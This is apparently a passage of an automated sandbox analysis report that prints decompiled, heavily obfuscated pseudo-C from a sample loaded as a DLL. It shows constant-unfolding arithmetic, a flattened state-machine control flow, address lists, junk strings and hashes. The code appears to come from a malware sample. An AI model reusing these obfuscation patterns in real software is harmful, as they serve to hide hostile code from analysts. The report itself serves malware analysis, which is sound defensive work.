				_v312 = 0x19b522;
				_v312 = _v312 << 7;
				_v312 = _v312 ^ 0x11162953;
				_v312 = _v312 ^ 0x1dcfd305;
				_v212 = 0x8a6fc0;
				_v212 = _v212 << 9;
				_v212 = _v212 ^ 0x14d4ca12;
				_v276 = 0xdb7845;
				_v276 = _v276 / _t866;
				_v276 = _v276 * 0x1c;
				_v276 = _v276 ^ 0x003237f1;
				_v124 = 0x91e545;
				_t867 = 0x7b;
				_v124 = _v124 / _t867;
				_v124 = _v124 ^ 0x0004745c;
				_v192 = 0x2154b3;
				_v192 = _v192 ^ 0x5324a52c;
				_v192 = _v192 ^ 0x530d1a47;
				_v140 = 0x7913eb;
				_v140 = _v140 | 0xe487e648;
				_v140 = _v140 ^ 0xe4fd51cb;
				_v428 = 0x8a554f;
				_v428 = _v428 << 1;
				_v428 = _v428 + 0xffff493d;
				_v428 = _v428 | 0x8f4663f4;
				_v428 = _v428 ^ 0x8f592165;
				_v200 = 0x5c4830;
				_v200 = _v200 + 0xffffe35d;
				_v200 = _v200 ^ 0x00549f8c;
				_v132 = 0x6e2e79;
				_t377 =  &_v132; // 0x6e2e79
				_t981 = 0x62;
				_v132 =  *_t377 / _t981;
				_v132 = _v132 ^ 0x000a369f;
				_v244 = 0x1d0d9a;
				_t868 = 0x6e;
				_v244 = _v244 / _t868;
				_v244 = _v244 ^ 0xec9a9004;
				_v244 = _v244 ^ 0xec94e609;
				_v148 = 0xd4a92;
				_v148 = _v148 + 0xffffbc3f;
				_v148 = _v148 ^ 0x00088ca7;
				_v184 = 0x3666a0;
				_v184 = _v184 >> 0xb;
				_v184 = _v184 ^ 0x00096f18;
				_v228 = 0x713966;
				_v228 = _v228 << 3;
				_v228 = _v228 << 0xb;
				_v228 = _v228 ^ 0x4e5b426e;
				_v316 = 0xec09e9;
				_v316 = _v316 << 7;
				_t869 = 0x78;
				_v316 = _v316 / _t869;
				_v316 = _v316 ^ 0x00fe5880;
				_v268 = 0x8ffe81;
				_v268 = _v268 + 0xffff4311;
				_v268 = _v268 ^ 0x56e15418;
				_v268 = _v268 ^ 0x566a144b;
				_v324 = 0x9f4c2e;
				_v324 = _v324 >> 4;
				_v324 = _v324 | 0x903f3b4d;
				_v324 = _v324 ^ 0x9031b6d7;
				_v196 = 0x6080cf;
				_v196 = _v196 << 0xe;
				_v196 = _v196 ^ 0x203ba000;
				_v256 = 0x4bba45;
				_v256 = _v256 + 0xc17c;
				_v256 = _v256 | 0x95e268b8;
				_v256 = _v256 ^ 0x95e68234;
				_v264 = 0x7821fc;
				_v264 = _v264 << 3;
				_t870 = 0x34;
				_v264 = _v264 / _t870;
				_v264 = _v264 ^ 0x001694e5;
				_v204 = 0x96f3a5;
				_v204 = _v204 * 0x24;
				_v204 = _v204 ^ 0x153e3a4b;
				_v368 = 0xbef911;
				_t871 = 0xe;
				_v368 = _v368 / _t871;
				_v368 = _v368 >> 0xb;
				_v368 = _v368 + 0x5de4;
				_v368 = _v368 ^ 0x00021c01;
				_v376 = 0x377d04;
				_v376 = _v376 + 0xcef;
				_v376 = _v376 ^ 0x9e466b70;
				_t872 = 0x59;
				_v376 = _v376 * 0x6b;
				_v376 = _v376 ^ 0x399834bf;
				_v180 = 0x6632ea;
				_v180 = _v180 | 0x3a3e38fd;
				_v180 = _v180 ^ 0x3a73a81b;
				_v248 = 0x142cd9;
				_v248 = _v248 / _t872;
				_v248 = _v248 / _t981;
				_v248 = _v248 ^ 0x0001d965;
				_v188 = 0x88b8e9;
				_v188 = _v188 + 0xffff5f5f;
				_v188 = _v188 ^ 0x0087927e;
				_v164 = 0x9c013d;
				_t873 = 0xa;
				_v164 = _v164 / _t873;
				_v164 = _v164 ^ 0x0004ead6;
				_v172 = 0x53b5f1;
				_v172 = _v172 + 0xd9f2;
				_v172 = _v172 ^ 0x005588af;
				_v360 = 0xd6ac8a;
				_v360 = _v360 | 0xfdf9fa5f;
				_v360 = _v360 ^ 0xfdfecc4d;
				_v224 = 0xfb951e;
				_v224 = _v224 + 0xffff2e4c;
				_v224 = _v224 + 0x8dcd;
				_v224 = _v224 ^ 0x00f1d24a;
				_v272 = 0x6e5d6f;
				_v272 = _v272 << 2;
				_t874 = 0x6f;
				_v272 = _v272 / _t874;
				_v272 = _v272 ^ 0x000d7a86;
				_v384 = 0x15dc31;
				_v384 = _v384 + 0xfffffc55;
				_v384 = _v384 << 0x10;
				_v384 = _v384 >> 0xa;
				_v384 = _v384 ^ 0x003c4753;
				_v392 = 0x7bc513;
				_v392 = _v392 * 0x54;
				_v392 = _v392 | 0xe01c3b63;
				_v392 = _v392 + 0xe1b2;
				_v392 = _v392 ^ 0xe89c6b16;
				_v420 = 0x6862b7;
				_v420 = _v420 ^ 0x841c6550;
				_v420 = _v420 + 0xd52;
				_v420 = _v420 >> 0x10;
				_v420 = _v420 ^ 0x000e8d54;
				_v388 = 0x19484a;
				_t982 = 0x6f661e6;
				_t875 = 0x68;
				_v388 = _v388 / _t875;
				_t876 = 0xd;
				_v92 = 0x100;
				_v388 = _v388 * 0x61;
				_v388 = _v388 << 6;
				_v388 = _v388 ^ 0x05e5c873;
				_v432 = 0xb160;
				_v432 = _v432 * 0x78;
				_v432 = _v432 >> 8;
				_v432 = _v432 ^ 0xee0de4a9;
				_v432 = _v432 ^ 0xee0e3c37;
				_v320 = 0x436488;
				_v320 = _v320 * 0x7d;
				_v320 = _v320 * 0x24;
				_v320 = _v320 ^ 0xa0a81f1c;
				_v136 = 0x73af31;
				_v136 = _v136 >> 0xf;
				_v136 = _v136 ^ 0x0004ab53;
				_v120 = 0xd23217;
				_v120 = _v120 | 0x86b48086;
				_v120 = _v120 ^ 0x86fe303d;
				_v280 = 0x567562;
				_v280 = _v280 / _t876;
				_v280 = _v280 + 0xffff7ef5;
				_v280 = _v280 ^ 0x00098751;
				_v152 = 0x24c9f6;
				_v152 = _v152 + 0x7f22;
				_v152 = _v152 ^ 0x002f2944;
				_v156 = 0xe548b;
				_v156 = _v156 + 0xe219;
				_v156 = _v156 ^ 0x000a95de;
				_v352 = 0xccf4e9;
				_v352 = _v352 | 0x0ed71748;
				_v352 = _v352 + 0xefd9;
				_v352 = _v352 << 3;
				_v352 = _v352 ^ 0x770f1835;
				while(1) {
					L1:
					while(1) {
						L2:
						while(1) {
							L3:
							_t957 = 0xaefec99;
							do {
								while(1) {
									L4:
									_t996 = _t853 - 0x89f995e;
									if(_t996 > 0) {
										break;
									}
									if(_t996 == 0) {
										E0087C237(_v108, _v432, _v320, _v136);
										_t853 = 0xc502d5f;
										while(1) {
											L1:
											goto L2;
										}
									} else {
										if(_t853 == 0x49f634) {
											_push(_v308);
											_push(_v356);
											_push(_v260);
											_t832 = E0087E1F8(0x8613d8, _v300, __eflags);
											_push(_v236);
											_push(_v176);
											_push(_v292);
											__eflags = E0086738A(_v220, _t832, _v380, _v412,  &_v112, E0087E1F8(0x861318, _v252, __eflags), _v284) - _v144;
											_t853 =  ==  ? 0xc917448 : 0x468e224;
											E0087FECB(_t832, _v396, _v364, _v404, _v168);
											E0087FECB(_t833, _v328, _v336, _v340, _v440);
											_t978 = _v96;
											_t987 = _t987 + 0x44;
											goto L31;
										} else {
											if(_t853 == 0x1281fcd) {
												E00862EBF(_v420, _v104, _v388);
												_t853 = 0x89f995e;
												while(1) {
													L1:
													goto L2;
												}
											} else {
												if(_t853 == _t824) {
													_push(_v212);
													_push(_v312);
													_push(_v216);
													_t985 = E0087E1F8(0x861368, _v436, __eflags);
													_t901 = 0x48;
													_v100 = 0x861368;
													_t844 = E008816C0(_v276, 0x861368, _v116,  &_v100, _v124, _v192, _t841, _v140, _v428, _t901, _v372, _v200, _v132,  &_v76);
													_t994 = _t987 + 0x3c;
													__eflags = _t844 - _v332;
													if(_t844 != _v332) {
														_t853 = 0xc502d5f;
													} else {
														_t975 =  *0x886224; // 0x0
														E0087C9B0(_v244, _t975 + 8, _v148, 0x40,  &_v68, _v184);
														_t994 = _t994 + 0x10;
														_t853 = 0x9badbc8;
													}
													E0087FECB(_t985, _v228, _v316, _v268, _v324);
													_t987 = _t994 + 0xc;
													L31:
													_t982 = 0x6f661e6;
													_t824 = 0x38eaa65;
													_t882 = 0xe81b6a7;
													_t957 = 0xaefec99;
													goto L32;
												} else {
													if(_t853 == 0x5c5114f) {
														E0086F7FE(_v156, _v112, _v352, _v344);
													} else {
														if(_t853 == _t982) {
															_t850 = E00863431(_v104);
															_t853 = 0x1281fcd;
															__eflags = _t850;
															_t986 =  !=  ? 1 : _t986;
															while(1) {
																L1:
																L2:
																L3:
																_t957 = 0xaefec99;
																goto L4;
															}
														} else {
															if(_t853 != 0x87433f6) {
																goto L32;
															} else {
																_t853 = 0x49f634;
																continue;
															}
														}
													}
												}
											}
										}
									}
									L35:
									return _t986;
								}
								__eflags = _t853 - 0x9badbc8;
								if(__eflags == 0) {
									_push(_v204);
									_push(_v264);
									_push(_v256);
									__eflags = E0086BC32( *((intOrPtr*)(_t978 + 4)),  &_v108, _v240, _v368, _v376, E0087E1F8(0x861368, _v196, __eflags),  *_t978, _v180, _v248, _v112, 0x861368, _v188) - _v232;
									_t853 =  ==  ? 0xaefec99 : 0xc502d5f;
									E0087FECB(_t819, _v164, _v172, _v360, _v224);
									_t987 = _t987 + 0x40;
									goto L31;
								} else {
									__eflags = _t853 - _t957;
									if(_t853 == _t957) {
										_t825 = E008651E7( &_v104, _v272, _v116, _v108, _v208, _v384, _v392);
										_t987 = _t987 + 0x14;
										__eflags = _t825;
										_t853 =  ==  ? _t982 : 0x89f995e;
										goto L1;
									} else {
										__eflags = _t853 - 0xc502d5f;
										if(_t853 == 0xc502d5f) {
											E0087C237(_v116, _v120, _v280, _v152);
											_t853 = 0x5c5114f;
											while(1) {
												L1:
												goto L2;
											}
										} else {
											__eflags = _t853 - 0xc917448;
											if(_t853 == 0xc917448) {
												_v100 = _v92;
												_t829 = E008843E6(_v400, _v128, _v408, _v112, _v416, _v160,  &_v116, _v92);
												_t987 = _t987 + 0x18;
												__eflags = _t829 - _v288;
												_t882 = 0xe81b6a7;
												_t824 = 0x38eaa65;
												_t853 =  ==  ? 0xe81b6a7 : 0x5c5114f;
												goto L3;
											} else {
												__eflags = _t853 - _t882;
												if(_t853 != _t882) {
													goto L32;
												} else {
													__eflags = E0087C2CF(_v304, _v348, _v424, _v116) - _v296;
													_t824 = 0x38eaa65;
													_t853 =  ==  ? 0x38eaa65 : 0xc502d5f;
													goto L2;
												}
											}
										}
									}
								}
								goto L35;
								L32:
								__eflags = _t853 - 0x468e224;
							} while (__eflags != 0);
							goto L35;
						}
					}
				}
			}

0x00870f90
0x00870f92
0x00870f99
0x00870fa6
0x00870fa8
0x00870fad
0x00870fb4
0x00870fbb
0x00870fc3
0x00870fcb
0x00870fd0
0x00870fd8
0x00870fe0
0x00870feb
0x00870ff3
0x00870ffe
0x00871013
0x0087101a
0x00871025
0x00871030
0x0087103b
0x00871046
0x00871051
0x00871059
0x00871061
0x00871069
0x00871074
0x0087107f
0x0087108a
0x00871095
0x008710a2
0x008710a5
0x008710a9
0x008710b6
0x008710ba
0x008710bf
0x008710ca
0x008710d5
0x008710e0
0x008710eb
0x008710f6
0x00871101
0x0087110c
0x00871117
0x00871122
0x00871134
0x00871139
0x00871142
0x0087114d
0x00871160
0x00871161
0x00871168
0x00871173
0x0087117b
0x00871186
0x0087118a
0x0087118f
0x0087119a
0x008711a5
0x008711b0
0x008711bb
0x008711ce
0x008711d7
0x008711e2
0x008711ea
0x008711f2
0x00871201
0x00871204
0x00871208
0x00871210
0x0087121b
0x0087122b
0x00871232
0x0087123d
0x00871248
0x00871253
0x0087125b
0x00871266
0x0087127c
0x00871283
0x0087128e
0x00871299
0x008712a4
0x008712af
0x008712ba
0x008712c5
0x008712d8
0x008712d9
0x008712e0
0x008712eb
0x008712f6
0x008712fd
0x00871305
0x00871310
0x0087131e
0x00871322
0x0087132f
0x00871333
0x0087133b
0x00871346
0x00871351
0x00871359
0x00871364
0x0087136c
0x00871374
0x0087137c
0x00871384
0x0087138c
0x00871394
0x00871399
0x008713a1
0x008713a6
0x008713ae
0x008713b6
0x008713be
0x008713c6
0x008713cb
0x008713d3
0x008713de
0x008713e9
0x008713f4
0x00871407
0x0087140e
0x00871419
0x00871424
0x0087142c
0x00871434
0x0087143c
0x00871444
0x00871454
0x00871459
0x00871464
0x00871467
0x0087146b
0x00871473
0x0087147b
0x00871480
0x00871490
0x00871494
0x0087149c
0x008714a4
0x008714ac
0x008714b4
0x008714bc
0x008714c4
0x008714cf
0x008714d7
0x008714e2
0x008714ea
0x008714f4
0x008714f5
0x008714fe
0x00871502
0x0087150a
0x00871512
0x0087151a
0x00871522
0x0087152a
0x00871532
0x0087153d
0x00871548
0x00871553
0x0087155e
0x00871566
0x0087156e
0x00871576
0x0087157b
0x00871583
0x0087158b
0x00871593
0x0087159d
0x008715a1
0x008715a9
0x008715b4
0x008715ca
0x008715d1
0x008715dc
0x008715e7
0x008715ef
0x008715fa
0x00871605
0x00871610
0x00871618
0x00871623
0x00871637
0x00871646
0x0087164d
0x0087165a
0x0087166e
0x00871673
0x0087167c
0x00871687
0x00871692
0x0087169d
0x008716a8
0x008716b3
0x008716be
0x008716c9
0x008716d1
0x008716d5
0x008716dd
0x008716e5
0x008716ed
0x008716f8
0x00871703
0x0087170e
0x00871719
0x00871720
0x00871725
0x0087172e
0x00871739
0x0087174b
0x00871750
0x00871759
0x00871764
0x0087176f
0x0087177a
0x00871785
0x00871790
0x0087179b
0x008717a3
0x008717ae
0x008717b9
0x008717c1
0x008717c9
0x008717d4
0x008717df
0x008717ee
0x008717f3
0x008717fc
0x00871807
0x00871812
0x0087181d
0x00871828
0x00871833
0x0087183e
0x00871846
0x00871851
0x0087185c
0x00871867
0x0087186f
0x0087187a
0x00871885
0x00871890
0x0087189b
0x008718a6
0x008718b1
0x008718c0
0x008718c3
0x008718ca
0x008718d5
0x008718e8
0x008718f1
0x008718fc
0x0087190a
0x0087190f
0x00871913
0x00871918
0x00871920
0x00871928
0x00871930
0x00871938
0x00871947
0x0087194a
0x0087194e
0x00871956
0x00871961
0x0087196c
0x00871977
0x0087198d
0x0087199f
0x008719a6
0x008719b1
0x008719bc
0x008719c7
0x008719d2
0x008719e4
0x008719e9
0x008719f2
0x008719fd
0x00871a08
0x00871a13
0x00871a1e
0x00871a26
0x00871a36
0x00871a3e
0x00871a49
0x00871a54
0x00871a5f
0x00871a6a
0x00871a75
0x00871a84
0x00871a87
0x00871a8e
0x00871a99
0x00871aa1
0x00871aa9
0x00871aae
0x00871ab3
0x00871abb
0x00871ac8
0x00871acc
0x00871ad4
0x00871adc
0x00871ae4
0x00871aec
0x00871af4
0x00871afc
0x00871b01
0x00871b09
0x00871b17
0x00871b1e
0x00871b23
0x00871b2e
0x00871b2f
0x00871b3a
0x00871b3e
0x00871b43
0x00871b4b
0x00871b58
0x00871b5c
0x00871b61
0x00871b69
0x00871b71
0x00871b84
0x00871b93
0x00871b9a
0x00871ba5
0x00871bb0
0x00871bb8
0x00871bc3
0x00871bce
0x00871bd9
0x00871be4
0x00871bf8
0x00871bff
0x00871c0a
0x00871c15
0x00871c20
0x00871c2b
0x00871c36
0x00871c41
0x00871c4c
0x00871c57
0x00871c5f
0x00871c67
0x00871c6f
0x00871c74
0x00871c7c
0x00871c7c
0x00871c81
0x00871c81
0x00871c86
0x00871c86
0x00871c86
0x00871c8b
0x00871c8b
0x00871c8b
0x00871c8b
0x00871c91
0x00000000
0x00000000
0x00871c97
0x00871f03
0x00871f0a
0x00871c7c
0x00871c7c
0x00000000
0x00871c7c
0x00871c9d
0x00871ca3
0x00871e0d
0x00871e19
0x00871e1d
0x00871e2b
0x00871e3a
0x00871e41
0x00871e48
0x00871e97
0x00871ea7
0x00871eb6
0x00871ed6
0x00871edb
0x00871ee2
0x00000000
0x00871ca9
0x00871caf
0x00871dfd
0x00871e03
0x00871c7c
0x00871c7c
0x00000000
0x00871c7c
0x00871cb5
0x00871cb7
0x00871cf7
0x00871d03
0x00871d0a
0x00871d1d
0x00871d28
0x00871d38
0x00871d76
0x00871d7b
0x00871d7e
0x00871d85
0x00871dbe
0x00871d87
0x00871d9f
0x00871daf
0x00871db4
0x00871db7
0x00871db7
0x00871de1
0x00871de6
0x008720f6
0x008720f6
0x008720fb
0x00872100
0x00872105
0x00000000
0x00871cb9
0x00871cbf
0x0087212e
0x00871cc5
0x00871cc7
0x00871ce3
0x00871cea
0x00871cf0
0x00871cf2
0x00871c7c
0x00871c7c
0x00871c81
0x00871c86
0x00871c86
0x00000000
0x00871c86
0x00871cc9
0x00871ccf
0x00000000
0x00871cd5
0x00871cd5
0x00000000
0x00871cd5
0x00871ccf
0x00871cc7
0x00871cbf
0x00871cb7
0x00871caf
0x00871ca3
0x00872137
0x00872141
0x00872141
0x00871f14
0x00871f1a
0x0087204f
0x0087205b
0x00872062
0x008720c6
0x008720dd
0x008720ee
0x008720f3
0x00000000
0x00871f20
0x00871f20
0x00871f22
0x00872038
0x0087203d
0x00872045
0x00872047
0x00000000
0x00871f28
0x00871f28
0x00871f2e
0x00871ffc
0x00872003
0x00871c7c
0x00871c7c
0x00000000
0x00871c7c
0x00871f34
0x00871f34
0x00871f3a
0x00871f86
0x00871fb6
0x00871fbd
0x00871fcc
0x00871fce
0x00871fd3
0x00871fd8
0x00000000
0x00871f3c
0x00871f3c
0x00871f3e
0x00000000
0x00871f44
0x00871f6f
0x00871f71
0x00871f76
0x00000000
0x00871f76
0x00871f3e
0x00871f3a
0x00871f2e
0x00871f22
0x00000000
0x0087210a
0x0087210a
0x0087210a
0x00000000
0x00872116
0x00871c86
0x00871c81

Strings

Na$, xrefs: 008712C5
2^~, xrefs: 0087150A
o]n, xrefs: 00871A6A
R, xrefs: 00871AF4
nB[N, xrefs: 008717C9
0H\, xrefs: 008716ED
inpG, xrefs: 00871419
D)/, xrefs: 00871C2B
Xn!, xrefs: 00871266
buV, xrefs: 00871BE4
x, xrefs: 008715B4
SG<, xrefs: 00871AB3
2f, xrefs: 00871956
jW, xrefs: 0087107F
], xrefs: 00871918
y.n, xrefs: 00871719
KN, xrefs: 0087151A
inpG, xrefs: 008713FF

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: 0H\$2^~$D)/$KN$Na$$R$SG<$Xn!$buV$inpG$inpG$jW$nB[N$o]n$x$y.n$2f$]
API String ID: 0-421492616
Opcode ID: 6536ac10a6a957ca87301d75d141ef814f9495ea57a4ccec5a8517ff7234d19c
Instruction ID: 631c86d7aea689fd257ab081521a78760e60ae9e5ba7e3c933dc42555f81c8ce
Opcode Fuzzy Hash: 6536ac10a6a957ca87301d75d141ef814f9495ea57a4ccec5a8517ff7234d19c
Instruction Fuzzy Hash: 5D9200711093818FD779CF65C98AB8BBBE2FBC4704F10891DE69A86261D7B18949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00872E5D, Relevance: 21.9, Strings: 17, Instructions: 653
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E00872E5D(int __ecx, signed int __edx) {
				char _v128;
				char _v256;
				char _v288;
				intOrPtr _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				unsigned int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				unsigned int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				unsigned int _v476;
				int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				unsigned int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				unsigned int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				unsigned int _v576;
				void* _t707;
				void* _t708;
				signed int _t718;
				signed int _t732;
				signed int _t737;
				int _t740;
				void* _t742;
				void* _t750;
				signed int _t752;
				signed int _t758;
				signed int _t768;
				signed int _t769;
				intOrPtr _t770;
				int _t774;
				signed int _t786;
				void* _t832;
				void* _t833;
				void* _t836;
				void* _t837;
				signed int _t844;
				signed int _t845;
				signed int _t846;
				signed int _t847;
				signed int _t848;
				signed int _t849;
				signed int _t850;
				signed int _t851;
				signed int _t852;
				signed int _t853;
				signed int _t854;
				signed int _t855;
				signed int _t856;
				signed int _t857;
				signed int _t858;
				signed int _t859;
				signed int _t860;
				void* _t861;
				void* _t864;
				void* _t867;
				signed int _t870;
				unsigned int* _t871;
				void* _t875;

				_t774 = __ecx;
				_t871 =  &_v576;
				_v296 = __edx;
				_v480 = __ecx;
				_v420 = 0x6e1d72;
				_v420 = _v420 << 5;
				_v420 = _v420 * 0x3c;
				_t864 = 0xffd9b77;
				_v420 = _v420 ^ 0x39dcd700;
				_v532 = 0x1f7a5f;
				_t845 = 0xe;
				_v532 = _v532 / _t845;
				_v532 = _v532 ^ 0x6f56ef0e;
				_v532 = _v532 >> 0xa;
				_v532 = _v532 ^ 0x001a3d41;
				_v508 = 0xe1e69b;
				_v508 = _v508 + 0x2215;
				_v508 = _v508 + 0xffff2958;
				_v508 = _v508 + 0xffffaa0c;
				_v508 = _v508 ^ 0x00efd475;
				_v540 = 0xcd1956;
				_v540 = _v540 | 0x45240a95;
				_t846 = 0x77;
				_v540 = _v540 * 0x18;
				_v540 = _v540 ^ 0x336e332d;
				_v540 = _v540 ^ 0xbd574949;
				_v484 = 0x334a44;
				_v484 = _v484 ^ 0x919eff65;
				_v484 = _v484 / _t846;
				_v484 = _v484 | 0x2d19544d;
				_v484 = _v484 ^ 0x2d3e50ce;
				_v436 = 0x66ccc0;
				_v436 = _v436 + 0xffffec65;
				_t847 = 0x52;
				_v436 = _v436 * 0x24;
				_v436 = _v436 ^ 0x0e7c9935;
				_v492 = 0x2c49e8;
				_v492 = _v492 << 6;
				_v492 = _v492 << 2;
				_v492 = _v492 + 0xffff7e7f;
				_v492 = _v492 ^ 0x2c4d1795;
				_v348 = 0xb21165;
				_v348 = _v348 >> 0xb;
				_v348 = _v348 ^ 0x000033e8;
				_v464 = 0x27371d;
				_v464 = _v464 / _t847;
				_v464 = _v464 + 0xc709;
				_v464 = _v464 ^ 0x00086d33;
				_v476 = 0xe8a891;
				_v476 = _v476 >> 0xf;
				_v476 = _v476 + 0xffff587a;
				_v476 = _v476 ^ 0xfffd6e16;
				_v568 = 0xc76fce;
				_v568 = _v568 + 0xbc5c;
				_v568 = _v568 * 3;
				_v568 = _v568 | 0x5aa2bc40;
				_v568 = _v568 ^ 0x5afa6d0d;
				_v456 = 0xcc33e1;
				_v456 = _v456 ^ 0x6317d795;
				_v456 = _v456 | 0x1eb23508;
				_v456 = _v456 ^ 0x7ff946e0;
				_v560 = 0xede4ef;
				_v560 = _v560 + 0xffffe679;
				_t848 = 0x70;
				_v560 = _v560 / _t848;
				_v560 = _v560 << 5;
				_v560 = _v560 ^ 0x0043644b;
				_v500 = 0x670a53;
				_v500 = _v500 | 0x71b65663;
				_t849 = 0x2b;
				_v500 = _v500 * 0x3d;
				_v500 = _v500 + 0xfb01;
				_v500 = _v500 ^ 0x27fbe352;
				_v460 = 0x5f6e6b;
				_v460 = _v460 << 0xe;
				_v460 = _v460 | 0xdb801e45;
				_v460 = _v460 ^ 0xdb911bcb;
				_v404 = 0x155fb3;
				_v404 = _v404 + 0x82cf;
				_v404 = _v404 | 0x7954f6f3;
				_v404 = _v404 ^ 0x79505431;
				_v364 = 0x6447e1;
				_v364 = _v364 << 4;
				_v364 = _v364 ^ 0x064cce00;
				_v452 = 0x93f6b7;
				_v452 = _v452 | 0x0efbc074;
				_v452 = _v452 * 0x74;
				_v452 = _v452 ^ 0xca274b72;
				_v516 = 0x2e9555;
				_v516 = _v516 * 0x4d;
				_v516 = _v516 ^ 0x52348c71;
				_v516 = _v516 + 0xffff65c2;
				_v516 = _v516 ^ 0x5c3ff1c5;
				_v556 = 0x4e7cf7;
				_v556 = _v556 * 0x30;
				_v556 = _v556 ^ 0xab1a74ca;
				_v556 = _v556 | 0x39490d7c;
				_v556 = _v556 ^ 0xbde6ca21;
				_v304 = 0x79a99e;
				_v304 = _v304 | 0x92bbf026;
				_v304 = _v304 ^ 0x92fabbf2;
				_v444 = 0xf2d903;
				_v444 = _v444 * 0x13;
				_v444 = _v444 << 3;
				_v444 = _v444 ^ 0x90370785;
				_v388 = 0xce947f;
				_v388 = _v388 + 0xf4e6;
				_v388 = _v388 + 0xffffe2fa;
				_v388 = _v388 ^ 0x00c891aa;
				_v440 = 0x3724ee;
				_v440 = _v440 ^ 0xc994252f;
				_v440 = _v440 + 0xffff9dbe;
				_v440 = _v440 ^ 0xc9a5a4c3;
				_v544 = 0x9c24f5;
				_v544 = _v544 >> 8;
				_v544 = _v544 * 0x12;
				_v544 = _v544 + 0xb91e;
				_v544 = _v544 ^ 0x0007bff8;
				_v448 = 0x5ce888;
				_v448 = _v448 / _t849;
				_v448 = _v448 ^ 0x9d1dcba1;
				_v448 = _v448 ^ 0x9d138551;
				_v552 = 0x5ae9b7;
				_v552 = _v552 + 0xffffcdd3;
				_v552 = _v552 >> 0xa;
				_v552 = _v552 >> 3;
				_v552 = _v552 ^ 0x000286f6;
				_v372 = 0x1cfcf8;
				_v372 = _v372 << 0x10;
				_v372 = _v372 ^ 0xfcf9df5b;
				_v572 = 0x7fff3;
				_v572 = _v572 << 3;
				_v572 = _v572 | 0xc07f6c1b;
				_t850 = 0x6c;
				_v572 = _v572 / _t850;
				_v572 = _v572 ^ 0x01c5e077;
				_v468 = 0xb8a28e;
				_v468 = _v468 >> 0xa;
				_t851 = 7;
				_v468 = _v468 * 0x38;
				_v468 = _v468 ^ 0x0004661e;
				_v472 = 0x1c4be2;
				_v472 = _v472 >> 0xb;
				_v472 = _v472 / _t851;
				_v472 = _v472 ^ 0x000b37fd;
				_v324 = 0x397321;
				_v324 = _v324 + 0x4649;
				_v324 = _v324 ^ 0x003dbcde;
				_v564 = 0x90a3d2;
				_v564 = _v564 >> 0xf;
				_v564 = _v564 | 0x55e281c1;
				_v564 = _v564 + 0xffff9c60;
				_v564 = _v564 ^ 0x55ec6797;
				_v524 = 0x36ce4e;
				_v524 = _v524 + 0x9321;
				_v524 = _v524 ^ 0x68577083;
				_v524 = _v524 + 0x842e;
				_v524 = _v524 ^ 0x686a3805;
				_v380 = 0xf92015;
				_t852 = 0x57;
				_v380 = _v380 * 0x31;
				_v380 = _v380 ^ 0x2faa62dc;
				_v428 = 0xf06949;
				_v428 = _v428 ^ 0xe190386e;
				_v428 = _v428 | 0xd7c767f0;
				_v428 = _v428 ^ 0xf7e62dec;
				_v316 = 0x53402;
				_v316 = _v316 ^ 0x1a7eacd5;
				_v316 = _v316 ^ 0x1a780dc3;
				_v396 = 0xea020b;
				_v396 = _v396 / _t852;
				_v396 = _v396 >> 7;
				_v396 = _v396 ^ 0x0007fa92;
				_v576 = 0x94f18;
				_v576 = _v576 + 0x323;
				_t853 = 0x5a;
				_v576 = _v576 / _t853;
				_v576 = _v576 >> 7;
				_v576 = _v576 ^ 0x0009d62c;
				_v340 = 0x5ab89e;
				_v340 = _v340 + 0xcec5;
				_v340 = _v340 ^ 0x005981b9;
				_v424 = 0xf4fb06;
				_v424 = _v424 << 0xf;
				_v424 = _v424 + 0x6e15;
				_v424 = _v424 ^ 0x7d84f79d;
				_v308 = 0xe5ad48;
				_v308 = _v308 + 0xffff809e;
				_v308 = _v308 ^ 0x00e6a4ab;
				_v432 = 0xc8665e;
				_v432 = _v432 | 0xb25d9dfb;
				_v432 = _v432 * 0x51;
				_v432 = _v432 ^ 0x9835fda6;
				_v536 = 0x3c612a;
				_v536 = _v536 ^ 0xe3614c8f;
				_v536 = _v536 + 0x89b2;
				_v536 = _v536 >> 3;
				_v536 = _v536 ^ 0x1c61cdd9;
				_v312 = 0xb1cab1;
				_v312 = _v312 + 0x5335;
				_v312 = _v312 ^ 0x00b6c298;
				_v332 = 0x3dadc5;
				_v332 = _v332 >> 0xf;
				_v332 = _v332 ^ 0x00096a38;
				_v320 = 0xd2cf6d;
				_t854 = 0x5e;
				_v320 = _v320 / _t854;
				_v320 = _v320 ^ 0x000f4fea;
				_v528 = 0xbc9a67;
				_t768 = 0x35;
				_v528 = _v528 / _t768;
				_v528 = _v528 ^ 0x531db0de;
				_v528 = _v528 << 2;
				_v528 = _v528 ^ 0x4c7ccc72;
				_v368 = 0x9c5377;
				_v368 = _v368 | 0xa0dcba47;
				_v368 = _v368 ^ 0xa0d1bf3f;
				_v416 = 0x1ec4a4;
				_t855 = 0x79;
				_v416 = _v416 * 0x28;
				_v416 = _v416 / _t855;
				_v416 = _v416 ^ 0x00072384;
				_v376 = 0x2ac77;
